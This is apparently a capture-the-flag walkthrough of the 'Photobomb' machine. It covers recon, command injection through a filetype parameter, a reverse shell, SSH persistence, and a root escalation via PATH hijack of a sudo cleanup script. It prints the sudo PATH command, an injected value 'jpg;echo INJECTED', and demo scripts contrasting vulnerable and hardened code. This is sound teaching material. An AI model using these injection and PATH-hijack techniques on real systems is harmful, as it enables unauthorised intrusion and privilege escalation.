PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
From the initial scan we get two open ports, SSH (22) and HTTP (80), and a hostname: the http-title shows the web server redirecting to http://photobomb.htb/, so we add that name to /etc/hosts before browsing.

The web server gives us this landing page. It reflects whatever URI you enter, which may be an injection point; we'll test that while we enumerate directories and vhosts.

While browsing through Burp we see a few .js files worth reading; inside one of them we find credentials, which let us log into http://photobomb.htb/printer/.

Messing around with the parameters throws an error page.

The part of the source shown in the error suggests it checks that the photo name matches a known entry and then simply concatenates photo name + filetype into the request it runs. The filetype half does not look like it gets the same check, so maybe we can insert our own command through it?

We can see confirmation that it has requested photo+filetype;our text here. Let's see whether we can get code execution; we can. Using the filetype parameter to append a `;` and a new command at the end of the string, we make the box reach back to our own host with wget, which confirms the injected command really runs. A Python3 one-liner in the same spot pops a shell as the user wizard.
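To make the injection concrete, here is an added example that is not the Photobomb application's own code (the page shows neither its language nor the exact command it builds). It assumes a small allowlist of photo names (beach, mountain, city) constructed for the demo and uses printf as a harmless stand-in for whatever converter the app really calls. The vulnerable builder concatenates the filetype into a shell string the way the error page suggested, so a filetype of jpg;echo INJECTED runs the second command, exactly as the wget callback did on the box; the hardened builder allowlists the filetype as well and hands every value to the program as its own argument.

```sh
#!/bin/sh
# Added example, not the Photobomb app's code. Models the pattern the error page
# hinted at: photo name is checked, filetype is not, and both are glued into one
# shell string. printf stands in for the real converter so nothing harmful runs.

# Constructed allowlist of photo names the app is assumed to know about.
valid_photo() {
    case "$1" in
        beach|mountain|city) return 0 ;;
        *) return 1 ;;
    esac
}

# Vulnerable: the filetype is interpolated unquoted into a string handed to
# "sh -c", so "jpg;<anything>" ends the intended command and starts a new one.
vulnerable_download() {
    valid_photo "$1" || { echo "invalid photo" >&2; return 1; }
    sh -c "printf 'converting %s\n' $1.$2"
}

# Hardened: the filetype is allowlisted too, and the values travel as separate
# argv entries; no shell ever re-parses user input.
safe_download() {
    valid_photo "$1" || { echo "invalid photo" >&2; return 1; }
    case "$2" in
        jpg|png) ;;
        *) echo "invalid filetype" >&2; return 1 ;;
    esac
    printf 'converting %s\n' "$1.$2"
}

# probe <builder> -> "injected" if the payload's trailing command ran, else "blocked"
probe() {
    out=$("$1" beach 'jpg;echo INJECTED' 2>/dev/null) || true
    case "$out" in
        *INJECTED*) echo injected ;;
        *) echo blocked ;;
    esac
}

probe vulnerable_download   # injected
probe safe_download         # blocked
```

On the box the trailing command was a wget to our host and then the Python3 one-liner; the mechanism is the same as the echo here. The hardened version shows the two checks that would have stopped it: an allowlist on every concatenated field, and no shell in between the web app and the program it runs.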

We quickly generate an SSH key pair, add the public key to wizard's authorized_keys, and SSH back into the box to enumerate things properly.
cat cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
The script we can run with sudo calls find by its bare name rather than an absolute path (note that cat and truncate are called as /bin/cat and /usr/bin/truncate), so whichever find comes first on PATH is what runs as root. We create a payload called find in ~/photobomb/ and prepend that directory to PATH when invoking the script. This only works because the sudo rule lets us set environment variables for that command; under sudo's default env_reset with secure_path, the PATH we pass would be discarded.
wizard@photobomb:~/photobomb$ sudo PATH=$(pwd):$PATH /opt/cleanup.sh
Just like that we pop a shell as root and the box is done.
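The same hijack, reproduced as an added example (not the box's files) that runs without sudo in a temporary directory, so the mechanism can be seen on any Linux host. The stand-in cleanup script mirrors the bare find call; the fixed variant uses /usr/bin/find, the same way the real script already calls /bin/cat and /usr/bin/truncate. Everything under the mktemp directory is constructed for the demo, and the fake find only writes a marker file instead of spawning a shell.

```sh
#!/bin/sh
# Added example, not the box's own files: reproduces the PATH hijack from the
# cleanup script without sudo. The only property that matters is that the
# script calls "find" by bare name, so the caller's PATH decides what runs.

WORK=$(mktemp -d)
mkdir -p "$WORK/home/source_images"
: > "$WORK/home/source_images/a.jpg"          # constructed "priceless original"

# cleanup_script vulnerable|fixed -> writes a stand-in for /opt/cleanup.sh
cleanup_script() {
    if [ "$1" = fixed ]; then
        FIND=/usr/bin/find                     # absolute path: PATH is not consulted
    else
        FIND=find                              # bare name: first match on PATH wins
    fi
    cat > "$WORK/cleanup.sh" <<EOF
#!/bin/sh
cd "$WORK/home"
$FIND source_images -type f -name '*.jpg' -exec chmod 644 {} \\;
EOF
    chmod 755 "$WORK/cleanup.sh"
}

# Attacker-controlled "find" dropped in a directory we can prepend to PATH.
# On the box this would be the payload in ~/photobomb/; here it just leaves a marker.
plant_fake_find() {
    cat > "$WORK/find" <<EOF
#!/bin/sh
echo "find hijacked, running as \$(id -un)" > "$WORK/marker"
EOF
    chmod 755 "$WORK/find"
}

# attack_result vulnerable|fixed -> prints "hijacked" or "safe"
attack_result() {
    cleanup_script "$1"
    plant_fake_find
    rm -f "$WORK/marker"
    # Same shape as the writeup's command, minus sudo: PATH=<our dir>:$PATH <script>
    PATH="$WORK:$PATH" "$WORK/cleanup.sh" >/dev/null 2>&1 || true
    if [ -f "$WORK/marker" ]; then echo hijacked; else echo safe; fi
}

attack_result vulnerable   # hijacked
attack_result fixed        # safe
```

The fix on the script side is the absolute path; the fix on the sudo side is to not grant the SETENV permission that lets a caller supply PATH, so sudo's secure_path applies even if a script author forgets.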
